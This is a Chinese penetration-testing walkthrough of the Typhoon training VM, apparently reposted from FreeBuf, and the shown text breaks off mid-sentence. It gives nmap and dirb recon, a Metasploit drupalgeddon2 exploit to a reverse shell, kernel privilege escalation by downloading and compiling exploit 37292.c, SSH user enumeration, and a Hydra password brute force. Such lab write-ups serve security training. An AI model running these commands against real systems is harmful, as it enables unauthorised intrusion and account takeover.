| 关键词: 192.168 漏洞 使用 27.128 一个 端口 利用 可以 Typhoon 攻击 |
该项目是PrismaCSI作者精心制作的项目环境,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。 Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon. Typhoon虚拟机包含多个漏洞和配置错误。Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,利用后步骤,信息收集和DNS攻击。 该项目有始有终会用到信息收集->通过信息收集到的各种思路进行getshell->获得getshell(十种方式)->内网信息枚举->提权,最终拿到flag.txt的过程,那么在这当中用到了一些小技巧都会在文章中演示出来,希望大家能动手也来和我一起学习渗透。 请注意:
信息收集渗透测试的本质就是信息收集,信息收集决定了你的攻击面的宽窄! 下面首先使用nmap进行信息收集 1. nmap扫描网段由于本项目环境是nat模式需要项目IP地址,对IP网段进行全网段扫描 nmap 192.168.27.0/24 -sP
2. nmap全端口扫描进行namp全端口服务枚举 nmap -p- 192.168.27.128 -A
可以看到开放了非常多的端口 nmap输出显示各种开放端口:21(ftp,可以匿名访问的)、22(ssh)、25(smtp)、53(domain)、80(http)、110(pop3)、111(rpcbind)、139(netbios-ssn)、 143(imap)、445(netbios-ssn)、631(ipp)、993(ssl/imaps)、995(ssl/pop3)、2049(nfs_acl)、3306(mysql)、5432(postgrespl)、8080(http) 、6379(redis)、27017(mongodb) 3. web目录枚举dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。 这里我们使用dirb对目录进行爆破枚举 dirb http://192.168.27.128/
http://192.168.27.128/phpmyadmin/ http://192.168.27.128/javascript/ http://192.168.27.128/robots.txt 通过dirb对目标网站进行扫描发现存在phpmyadmin以及robots.txt和drupal,cms等目录文件 攻击思路(一):drupal漏洞利用msfconsole 使用msf进行漏洞利用 查找drupal模块 search drupal 有很多漏洞,尝试使用最新的2018年的exp use exploit/unix/webapp/drupal_drupalgeddon2 填写攻击ip地址 set rhosts 192.168.27.128 这里注意扫描目录要修改一下 set TARGETURI /drupal 拿到一个反弹shell /bin/bash -i 获取一个稳定shell
查看版本 uname -a 直接查找3.13.0 searchsploit 3.13.0
直接使用脚本 searchsploit -m linux/local/37292.c 将exp复制到当前目录,并开启http服务,将exp下载到目标机器 python -m SimpleHTTPServer 8080 编译并命名为ylion,授予ylion权限并运行 gcc 37292.c -o ylion 提权成功 成功拿到root权限! 攻击思路(二):SSH端口爆破发现端口22开放,其版本为openssh 6.6.1p1 利用OpenSSH新爆出的CVE爆出目标主机的用户,这对特定的用户爆破密码,建议爆破1000条 searchsploit openssh OpenSSH 2.3 < 7.7 - Username Enumeration 可以直接使用这个poc脚本进行攻击 只要在search里面能找到的exp或者poc,在msf里面都是有的 search ssh/ssh_ 使用第六个 use auxiliary/scanner/ssh/ssh_enumusers 查看参数 set thosts 192.168.27.128 修改为攻击ip 将爆破字典放到桌面的目录下
并且写入参数中,如下 由于是爆破,把线程调为20 set threads 20 然后输入run开始运行
爆破完成,找到admin账户 使用九头蛇hydra对靶机的ssh进行爆破 hydra -l admin -P /root/Desktop/1/66/rockyou.txt 192.168.27.128 ssh 用户名为:admin 密码为:metallica ssh [email protected] ssh远程登录成功 查看 可以直接提权 sudo bash 提权成功 攻击路径(三):phpMoAdminphpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。 从之前nmap扫描的数据可以看到如下 访问:http://192.168.27.128/robots.txt
访问/robots. |
| 本文出处: https://www.freebuf.com/vuls/343103.html |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|